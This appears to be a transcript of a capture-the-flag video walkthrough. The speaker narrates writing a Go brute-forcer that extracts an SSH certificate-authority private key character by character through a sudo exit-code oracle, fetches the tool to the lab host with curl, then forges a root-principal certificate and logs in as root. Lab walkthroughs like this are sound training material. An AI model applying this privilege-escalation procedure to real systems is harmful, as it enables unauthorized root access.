CA was here, right? grep CA, CIT. We know it's 432 characters, right? But you won't always see that. If we didn't have access to this directory, we wouldn't be able to see the size. So that's why I'm just leaving it like this, right? But we could just say, oh, we know it's 432, so that's the loop we're going to set it to. So now we're going to do for the iterator. So this is going to be the counter in the loop. And then the character over range of char set. And let's see, if I is equal to the length of the char set minus 1, then we return. So this breaks the forever loop. We could also like put a end loop here, I think. And we could say break end loop like that, right? I think that works in Golang. So either way works. We'll do it that way. Let's see. We couldn't just do break because if I just did break, it would break out of this loop, right? So that's why I specified end loop like that. So we loop over this. We want to do a file seek and then 0. And then we'll do seek start. So what we're doing here, every time we enter the loop, we're seeking to the beginning of the file. And then we're going to do a file write string. And then we can do fmt sprint f. And then 2 strings, the output and the character. Right, like that. And then we do a star. And this has to be a string because right now when I'm looping over, it's actually a rune. A rune is just an int32. And the reason why it's going from a string to a rune like this and not a character is because it doesn't know what encoding this is. It doesn't know this as ASCII. It could be like UTF-8 and have non-ASCII characters, which could be represented by int32, but not just a single character string. It's a weird like encoding thing, but that's why I do that. So now we have the file. What I want to do here is create a separate function. so we can test the file. So I'm going to do func. I'm just going to call this test command, and then it will return a Boolean and an error. And then the command is going to be, let's go back here. Do I have the history? We can grab this. Like this. Okay. We just called it CA. We didn't do test CA. A support 1. That looks fine. Then we can do cmd is exec command bash -c command. So now we run the command. So error is that. If our error is null, we return, that's fine. Actually, we don't. So anytime the exit is not going to be 0, this CMD is going to return error. So we want to actually have some error handling here. So I'm going to do a switch CMD process state exit code. And then case 1, this is going to be return true nil. Then case 2, it's going to be return false nil. So what we're doing here, I'm going to make this a little smaller. Hopefully that makes it less obnoxious. But we're treating this error as there was a major error, it's unexpected, right? And this Boolean is going to be, does the file match the CA or not? So we have that. And now we can return this as error. And then I don't think we'd ever really hit that, but sure. Okay, so that works. And I say we won't really ever hit this because the sudo command's never going to successfully complete because we're not giving it a public key here. So it's going to fail trying to sign user.txt. But this should work. This is actually case 255, right? When we looked at the exit code, it was 1 and 255. That's fine. So here we just wrote the new file. So we can do result error is equal to test command. If error is nil, we're going to panic because like we have some type of major error here. The CMD failed to run altogether. If the result is true, this means the file matched. So we're going to say output append the string. And then we just want to print the single character. So string char. And then we can break. So we break out of the first loop because we found the match. We don't need to keep brute forcing this one character. And that may be it. Let's see if it works. So we can go build Python 3m HTTP server. Then we'll do a curl HTTP 10.10.14.8 8000 keygen brute. I'll just call this exploit to make it easy. Run it. And let's see. It looks like it's working. I don't like how I did print line there real quick. So let's go back here. I'm just going to do print so we don't end it with a line break. Do the same thing with output. We want to do go build, serve it, download, run it. There we go. And we could also put a time in, so it will tell us how long this takes to run. I think it's going to take about 10 minutes. But you can see it going through character by character. Let's see. If I go into the box, ZZINTER, SSH-I, ZZINTER. What do we call this certificate? 400. What? See, enter. at 10.10.11.27. I wonder if I changed the pub key there. I probably did. Let's exit that, go here where support is, send this to pane 4, then etc SSH. We're in dev actually. SHM. So what I do is just show what the CA looks like, right? We could just do watch-n1 like this. And you can see it attempting to brute force, right? So we've got W. You can see how many characters it goes at a time. I wonder if we can change n to be 0.1. There we go. And you can see it attempting to brute force and exactly how it's working. Every time it's doing a character, again, it's then running the sudo to check. So this will probably take another 8 or so minutes. So I'm going to pause the stream and we'll resume when it's done. Okay. And now that it's done, we have most of the key. It stopped where the space was. And I'm guessing we just forgot to add a space when I was testing line break. Yes, we needed a space there. If we had that, then it would get the rest of that key. But we should be able just to manually fill this piece in. So we can copy this. Let's go back to our host. And let's see, we can just go here. I'm going to make a new directory. We'll call this root, I guess, VCA. That's not the right key. There we go. And it's probably end open SSH private key. And then 1, 2, 3, 4, 5, I want to say. Yes, that looks right. 1, 2, 3, 4, 5. That should be it. tail-1, let's look, just double check. Yeah, that's it. So we're going to chmod 600 on CA, then SSH-Keygen, let's do ed25519. I'm going to call this, we'll call it IPsec. Again, key name doesn't matter because we're signing it with a principal, right? So we have the key here, the CA, so we can do SSH-Keygen. The identity, again, identity does not matter. S to specify the CA file. The N is the principal. And since we have the key now, we can give it the, I think it's root underscore principal, root underscore user. Etc SSH, auth principals root. Yes, we can give it root underscore user. So we can copy this, go back here, give it this principal, and then the pub key. There we go. So now we have a key that's valid forever. So if we do SSH-Keygen-LF, we can see the cert has the root user principal. So if I SSH-I, my private key has root at 10.10.11.27. Don't forget the host listens on port 2222. This lets us in. And that's how we can root the box. And also keep in mind, to show exactly how this is working, if we catted the auth principals on support, you can see this key is also valid for the support user. So we can use the same exact key as support and it will let us in. But the ZZINTER user only has the ZZINTER temp principal. So this key would not let us log in as ZZINTER, right? So hopefully the SSH certificate authority makes sense by the end of this video. And yeah, that's going to be the box. Hope you guys enjoyed it. Take care, and I will see you all next time.